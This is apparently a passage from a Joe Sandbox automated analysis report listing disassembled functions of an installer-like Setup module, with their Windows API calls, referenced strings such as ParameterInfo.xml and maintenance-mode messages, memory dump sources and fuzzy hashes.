                                                                                              • Opcode ID: 54a3ab422431ec9095eb1291f8df9957a00dabea0d2535d2b5ab3dbe43e5adfc
                                                                                              • Instruction ID: 2a13ca554196a5d0b584eb58e83603647d90c4d82ead733105fa28d1d701ee8a
                                                                                              • Opcode Fuzzy Hash: 54a3ab422431ec9095eb1291f8df9957a00dabea0d2535d2b5ab3dbe43e5adfc
                                                                                              • Instruction Fuzzy Hash: 90510A7190020DDFCF20DFA8C9419EE7BB8AF15358F158965E420EBB51C734DA19CBA2
                                                                                              Function 6C8D56A3 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 107COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C90988C: __EH_prolog3.LIBCMT ref: 6C909893
                                                                                                • Part of subcall function 6C90988C: GetCommandLineW.KERNEL32(0000002C,6C90D52A,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C9098B4
                                                                                                • Part of subcall function 6C90988C: PathIsRelativeW.SHLWAPI(?,?,?,00000000,?,UiInfo.xml,?,?,00000000,?), ref: 6C90996E
                                                                                                • Part of subcall function 6C8CA8CC: __EH_prolog3.LIBCMT ref: 6C8CA8D3
                                                                                                • Part of subcall function 6C8CA8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CA90B
                                                                                                • Part of subcall function 6C8CA8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CA964
                                                                                                • Part of subcall function 6C8CA8CC: __CxxThrowException@8.LIBCMT ref: 6C8CAA28
                                                                                                • Part of subcall function 6C8D57E5: __EH_prolog3.LIBCMT ref: 6C8D57EC
                                                                                                • Part of subcall function 6C918EAB: _memcpy_s.LIBCMT ref: 6C918EFC
                                                                                                • Part of subcall function 6C8CA8CC: SetFilePointer.KERNEL32(?,00000000,6C8BA794,00000001,?,00000000,00000000,00000002,?,80000000,00000001,00000003,00000080,00000000,00000000,?), ref: 6C8CAA49
                                                                                                • Part of subcall function 6C8CA8CC: ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CAA97
                                                                                                • Part of subcall function 6C8CA8CC: SysAllocStringLen.OLEAUT32(00000000,?), ref: 6C8CAAAC
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C8D578A
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C8D5799
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C8D57C7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3String$FileFree$PathRelative$AllocCommandException@8LineModuleNamePointerReadThrow_memcpy_s
                                                                                              • String ID: ParameterInfo.xml$UiInfo.xml
                                                                                              • API String ID: 3873923459-386449131
                                                                                              • Opcode ID: 4d881244b8733a975ee381aaf1af8dcc92c88472666a28caf07b0ff43028c172
                                                                                              • Instruction ID: 08d10b0593ba9c94f26f50045469761b73b1a0c896ada88c913cf72c019d42b8
                                                                                              • Opcode Fuzzy Hash: 4d881244b8733a975ee381aaf1af8dcc92c88472666a28caf07b0ff43028c172
                                                                                              • Instruction Fuzzy Hash: 9B31BFB2508345AFCB10DF68C941A8BBBE8FFA5628F140E1EF490D7750D734E5088BA2
                                                                                              Function 6C90972F Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 6C8D5044: __EH_prolog3.LIBCMT ref: 6C8D504B
                                                                                                • Part of subcall function 6C8C39AD: __EH_prolog3.LIBCMT ref: 6C8C39B4
                                                                                                • Part of subcall function 6C8CA8CC: __EH_prolog3.LIBCMT ref: 6C8CA8D3
                                                                                                • Part of subcall function 6C8CA8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CA90B
                                                                                                • Part of subcall function 6C8CA8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CA964
                                                                                                • Part of subcall function 6C8CA8CC: __CxxThrowException@8.LIBCMT ref: 6C8CAA28
                                                                                              • GetCommandLineW.KERNEL32(?,?,?,?,38D98A99,?,?,?,?,ParameterInfo.xml,?,?,00000738,6C8FFA6E,?,6C8BA794), ref: 6C9097B2
                                                                                                • Part of subcall function 6C8C3E77: __EH_prolog3.LIBCMT ref: 6C8C3E7E
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C90985E
                                                                                                • Part of subcall function 6C8D4798: __EH_prolog3.LIBCMT ref: 6C8D479F
                                                                                                • Part of subcall function 6C8D50D5: __EH_prolog3_catch.LIBCMT ref: 6C8D50DC
                                                                                                • Part of subcall function 6C8D50D5: CoInitialize.OLE32(00000000), ref: 6C8D512A
                                                                                                • Part of subcall function 6C8D50D5: CoCreateInstance.OLE32(6C8BA974,00000000,00000017,6C8BA9A4,00000738,?,?,?,00000000,?,?,?,38D98A99,?,?,?), ref: 6C8D5148
                                                                                                • Part of subcall function 6C8D50D5: CoUninitialize.COMBASE(02F92298,?,succeeded,?,?,?,00000000,?,?,?,38D98A99,?,?,?), ref: 6C8D51E6
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C909818
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C909833
                                                                                              Strings
                                                                                              • Loading localized engine data for language %d from %s, xrefs: 6C90977B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$FreeString$CommandCreateException@8FileH_prolog3_catchInitializeInstanceLineModuleNamePathRelativeThrowUninitialize
                                                                                              • String ID: Loading localized engine data for language %d from %s
                                                                                              • API String ID: 509998568-3315213612
                                                                                              • Opcode ID: 9ec0c4df1929ee05067cccb004f3686f66932ec7f1dd8e316a135762a2df2b54
                                                                                              • Instruction ID: 96d4f579bdb4028b56e563730d29410e35c0b09e9ac8c51adc3cda5db25dd069
                                                                                              • Opcode Fuzzy Hash: 9ec0c4df1929ee05067cccb004f3686f66932ec7f1dd8e316a135762a2df2b54
                                                                                              • Instruction Fuzzy Hash: 17416272108344AFC711DF68C845A9BBBE8AF95328F004E2EF49592690DB34D908CB96
                                                                                              Function 6C8D19AD Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 103COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8D19B4
                                                                                                • Part of subcall function 6C8C8B9F: __EH_prolog3.LIBCMT ref: 6C8C8BA6
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8D1ADE
                                                                                              Strings
                                                                                              • ParameterInfo.xml, xrefs: 6C8D1902, 6C8D1A2F
                                                                                              • can only have one logical or arithmietic expression for a child node, xrefs: 6C8D1A54
                                                                                              • schema validation failure: , xrefs: 6C8D1A40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8Throw
                                                                                              • String ID: can only have one logical or arithmietic expression for a child node$ParameterInfo.xml$schema validation failure:
                                                                                              • API String ID: 2489616738-4045823434
                                                                                              • Opcode ID: ba6cd557cf737cb7ca4a42082eafacbdd2ddbd3bab32aa017f1b91e6c27fca2d
                                                                                              • Instruction ID: 1d33d71618b5ff6008db72eba58c3f5f38ff7c69ae148f5860afc60a73014e7e
                                                                                              • Opcode Fuzzy Hash: ba6cd557cf737cb7ca4a42082eafacbdd2ddbd3bab32aa017f1b91e6c27fca2d
                                                                                              • Instruction Fuzzy Hash: 36414F71511109AFCB10DFA8CA45BEEB7B9BF15328F148559E424DB780CB34EA09DB61
                                                                                              Function 6C8D1C2E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 69COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8D1C35
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8D19AD: __EH_prolog3.LIBCMT ref: 6C8D19B4
                                                                                                • Part of subcall function 6C8D19AD: __CxxThrowException@8.LIBCMT ref: 6C8D1ADE
                                                                                                • Part of subcall function 6C8C8AAC: __EH_prolog3.LIBCMT ref: 6C8C8AB3
                                                                                                • Part of subcall function 6C8C8AAC: __CxxThrowException@8.LIBCMT ref: 6C8C8B39
                                                                                                • Part of subcall function 6C8C92D1: __EH_prolog3.LIBCMT ref: 6C8C92D8
                                                                                                • Part of subcall function 6C8C838A: __EH_prolog3.LIBCMT ref: 6C8C8391
                                                                                                • Part of subcall function 6C8CA378: __EH_prolog3.LIBCMT ref: 6C8CA37F
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8D1D02
                                                                                                • Part of subcall function 6C9214AA: KiUserExceptionDispatcher.NTDLL(?,?,6C91C129,00000C00,?,?,?,?,6C91C129,00000C00,6C93BA3C,6C9576D4,00000C00,00000020,6C8FF845,?), ref: 6C9214EC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8Throw$DispatcherExceptionUser
                                                                                              • String ID: IsPresent$ParameterInfo.xml$schema validation failure: IsPresent can only be authored once.
                                                                                              • API String ID: 2724732616-4158871691
                                                                                              • Opcode ID: 534316091a638a9a6951896532149dfda31369ede12ab3445dfcd0952967a9cb
                                                                                              • Instruction ID: 3782823f842688b0363b3690a549ca50b23c344d418c2965aae6d5416e978013
                                                                                              • Opcode Fuzzy Hash: 534316091a638a9a6951896532149dfda31369ede12ab3445dfcd0952967a9cb
                                                                                              • Instruction Fuzzy Hash: 27219071810148BACF20DBE8CA45ADD7BB8AF25318F148959F064ABB80CB70DB0CD762
                                                                                              Function 6C90360F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CheckTokenMembership.KERNELBASE(00000000,?,?), ref: 6C90365F
                                                                                              • GetLastError.KERNEL32 ref: 6C903669
                                                                                                • Part of subcall function 6C8C7479: __EH_prolog3.LIBCMT ref: 6C8C7480
                                                                                              • GetLastError.KERNEL32 ref: 6C90368B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CheckH_prolog3MembershipToken
                                                                                              • String ID: AllocateAndInitializeSid$CheckTokenMembership
                                                                                              • API String ID: 3752544998-2579124284
                                                                                              • Opcode ID: 12e7d204a92d3ac98518b3aa9e32192d54634959fdd86adf70f53ca6f92c8e65
                                                                                              • Instruction ID: b9baa6b2c15c4fd937833e382ca8a29ef78d7020b34dce6ec85bbf953cd71acc
                                                                                              • Opcode Fuzzy Hash: 12e7d204a92d3ac98518b3aa9e32192d54634959fdd86adf70f53ca6f92c8e65
                                                                                              • Instruction Fuzzy Hash: DD117C75B00219AFCB14DFA9C98AC6EBBB9FF48314B11492DE456A3740DB70E900CB51
                                                                                              Function 6C8D58F5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8D58FC
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8CA8CC: __EH_prolog3.LIBCMT ref: 6C8CA8D3
                                                                                                • Part of subcall function 6C8CA8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CA90B
                                                                                                • Part of subcall function 6C8CA8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CA964
                                                                                                • Part of subcall function 6C8CA8CC: __CxxThrowException@8.LIBCMT ref: 6C8CAA28
                                                                                              • StrPBrkW.SHLWAPI(00000000,) <>",#(loc.,?,6C8FFA6E,6C8FFA6E,00000718,02F92298,?,00000000,00000010,6C8D6171,00000000,00000748,?,ParameterInfo.xml), ref: 6C8D5972
                                                                                              • SysFreeString.OLEAUT32(6C8FFA6E), ref: 6C8D59A3
                                                                                                • Part of subcall function 6C918C9E: _memcpy_s.LIBCMT ref: 6C918CE4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8FileFreeModuleNamePathRelativeStringThrow_memcpy_s
                                                                                              • String ID: #(loc.$) <>"
                                                                                              • API String ID: 3035459583-3905424865
                                                                                              • Opcode ID: a4634fa2c2f6fce09e2726277f01874e8473e2e0cde002193fbede187e7fdcab
                                                                                              • Instruction ID: 0509977c84c85be2eee8b805757345a9fac3953944220659b2c845b1c196723e
                                                                                              • Opcode Fuzzy Hash: a4634fa2c2f6fce09e2726277f01874e8473e2e0cde002193fbede187e7fdcab
                                                                                              • Instruction Fuzzy Hash: 2B11A871D01229AFCF20DFE4CE445EEBB74AF11368B010D25E520A7B90D775E919DBA0
                                                                                              Function 6C8F586D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60synchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8F5874
                                                                                              • OpenMutexW.KERNEL32(00100000,00000000,00000030,?,Global\,00000000,6C90BDA7,?,00000000,?,?,?,?,?,Command-line option error: ,?), ref: 6C8F58FB
                                                                                              • CreateMutexW.KERNEL32(00000000,00000000,00000030), ref: 6C8F590B
                                                                                              • GetLastError.KERNEL32 ref: 6C8F5913
                                                                                                • Part of subcall function 6C8F8CD5: __EH_prolog3.LIBCMT ref: 6C8F8CDC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3Mutex$CreateErrorLastOpen
                                                                                              • String ID: Global\
                                                                                              • API String ID: 2685780869-188423391
                                                                                              • Opcode ID: 21562673e5ad95e9376fa4a991a237847f5a7e1538b6e0c3149a856108da7a83
                                                                                              • Instruction ID: 1a3f59ffe134b9052c05abcf518f4b29025710906f57b84e94be112941545efe
                                                                                              • Opcode Fuzzy Hash: 21562673e5ad95e9376fa4a991a237847f5a7e1538b6e0c3149a856108da7a83
                                                                                              • Instruction Fuzzy Hash: C021DF71600344DFDB21DF68C988B8A7BF1AF55368F2088A9E864CFB45CB74D915CBA1
                                                                                              Function 6C8E4A3F Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8E4A46
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: evaluates to 'in maintenance mode'$ evaluates to 'not in maintenance mode'$MaintenanceMode determination$evaluating EnterMaintenanceModeIf
                                                                                              • API String ID: 431132790-4185790000
                                                                                              • Opcode ID: 7595f900d8db854d051c885738a156824684315f0001af4103d9d4084a563f28
                                                                                              • Instruction ID: ccf655126a8b24c4c610226b83f42f61b9a1fc3b2ca7f83b34e9cf880cced698
                                                                                              • Opcode Fuzzy Hash: 7595f900d8db854d051c885738a156824684315f0001af4103d9d4084a563f28
                                                                                              • Instruction Fuzzy Hash: 4B11C231800119EFCF10DFE8C944BEDBBB4AF16308F14886AE550ABB51C775DA49D750
                                                                                              Function 6C90FF5C Relevance: 8.2, APIs: 2, Strings: 3, Instructions: 651COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32(?,38D98A99), ref: 6C90FF9B
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C910900
                                                                                                • Part of subcall function 6C8C4CB2: __EH_prolog3.LIBCMT ref: 6C8C4CB9
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8F8CD5: __EH_prolog3.LIBCMT ref: 6C8F8CDC
                                                                                                • Part of subcall function 6C8C391D: __EH_prolog3.LIBCMT ref: 6C8C3924
                                                                                                • Part of subcall function 6C91C0AA: _malloc.LIBCMT ref: 6C91C0C4
                                                                                                • Part of subcall function 6C8E24CD: __EH_prolog3.LIBCMT ref: 6C8E24D4
                                                                                                • Part of subcall function 6C8E24CD: __CxxThrowException@8.LIBCMT ref: 6C8E255B
                                                                                                • Part of subcall function 6C912306: __EH_prolog3.LIBCMT ref: 6C91230D
                                                                                                • Part of subcall function 6C914C0C: __EH_prolog3.LIBCMT ref: 6C914C13
                                                                                                • Part of subcall function 6C8FBC09: __EH_prolog3.LIBCMT ref: 6C8FBC10
                                                                                                • Part of subcall function 6C914EE6: __EH_prolog3.LIBCMT ref: 6C914EED
                                                                                                • Part of subcall function 6C914EE6: __recalloc.LIBCMT ref: 6C914EFB
                                                                                                • Part of subcall function 6C914EE6: __recalloc.LIBCMT ref: 6C914F17
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$CriticalSection__recalloc$EnterException@8LeaveThrow_malloc
                                                                                              • String ID: determination is complete$Applicability for $evaluating each item
                                                                                              • API String ID: 283897231-3228949585
                                                                                              • Opcode ID: 4b6dc5747f0341a35a4f3eb28a063dac5d390fa9eca3214ff59be06097730f0d
                                                                                              • Instruction ID: 57d8699c01f1a8f05060a6c5b324e43d8aa7aafcbc242b5202779597ee49e1a0
                                                                                              • Opcode Fuzzy Hash: 4b6dc5747f0341a35a4f3eb28a063dac5d390fa9eca3214ff59be06097730f0d
                                                                                              • Instruction Fuzzy Hash: 7A5244715083859FC720CF28C581A9BBBE4BF98318F014D6EF5A897B51DB31E949CB62
                                                                                              Function 6C90A4AF Relevance: 7.7, APIs: 5, Instructions: 163COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C90A4B6
                                                                                              • GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,?,?,?,6C90A210,?,00000000,?,?,6C8F4B23), ref: 6C90A523
                                                                                              • GetTokenInformation.KERNELBASE(?,00000001,00000000,00000008,00000008,00000008,?,?,6C90A210,?,00000000,?,?,6C8F4B23), ref: 6C90A566
                                                                                              • LookupAccountSidW.ADVAPI32(00000000,00000000,00000000,00000008,00000010,00000008,6C8F4614,00000008,00000104,?,?,6C90A210,?,00000000), ref: 6C90A59C
                                                                                                • Part of subcall function 6C918AFC: _wcsnlen.LIBCMT ref: 6C918B0C
                                                                                              • CloseHandle.KERNEL32(?,?,?,6C90A210,?,00000000,?,?,6C8F4B23), ref: 6C90A5CF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: InformationToken$AccountCloseH_prolog3HandleLookup_wcsnlen
                                                                                              • String ID:
                                                                                              • API String ID: 1930416738-0
                                                                                              • Opcode ID: 8cc77ec7cbff6255e616ab9999b676f2bb3dcf1aa67b9e70d11f8707edc441b6
                                                                                              • Instruction ID: 494d4edf4ec1f872312e03b0082155f5f33fa75463cba061df3b676d47358ad1
                                                                                              • Opcode Fuzzy Hash: 8cc77ec7cbff6255e616ab9999b676f2bb3dcf1aa67b9e70d11f8707edc441b6
                                                                                              • Instruction Fuzzy Hash: 78618F729102099FDF11CFA8CC46AEE7BB5BF24328F154609F920A7790CB74DA15DBA4
                                                                                              Function 6C8F4880 Relevance: 7.6, APIs: 5, Instructions: 136threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6C8F488A
                                                                                                • Part of subcall function 6C8F31D3: __EH_prolog3_catch.LIBCMT ref: 6C8F31DA
                                                                                                • Part of subcall function 6C8F31D3: _free.LIBCMT ref: 6C8F3269
                                                                                              • GetCurrentThread.KERNEL32 ref: 6C8F495F
                                                                                              • OpenThreadToken.ADVAPI32(00000000,00000008,00000001,?), ref: 6C8F4971
                                                                                              • GetCurrentProcess.KERNEL32 ref: 6C8F497B
                                                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6C8F498B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentOpenProcessThreadToken$H_prolog3_H_prolog3_catch_free
                                                                                              • String ID:
